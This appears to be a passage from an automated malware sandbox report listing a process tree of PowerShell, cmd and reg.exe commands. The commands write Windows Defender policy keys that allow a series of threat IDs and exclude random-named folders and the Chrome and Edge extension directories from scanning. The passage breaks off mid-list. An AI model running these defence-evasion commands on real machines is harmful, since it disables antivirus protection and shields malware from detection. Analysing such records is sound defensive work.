C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6096
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:6024
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2924
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:323⤵PID:5860
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:324⤵PID:5852
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:643⤵PID:5748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:323⤵PID:3880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:643⤵PID:6112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:323⤵PID:6028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:643⤵PID:6016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:323⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:643⤵PID:2376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:323⤵PID:6056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:643⤵PID:6032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:323⤵PID:5644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:643⤵PID:6092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:323⤵PID:5764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:643⤵PID:5540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:323⤵PID:3680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:643⤵PID:5560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:323⤵PID:5468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:643⤵PID:5360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:323⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:643⤵PID:5216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:323⤵PID:5208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:643⤵PID:6024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:323⤵PID:5144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:643⤵PID:3068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:323⤵PID:4084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:643⤵PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:323⤵PID:5260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:643⤵PID:5264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:323⤵PID:5228
-
-
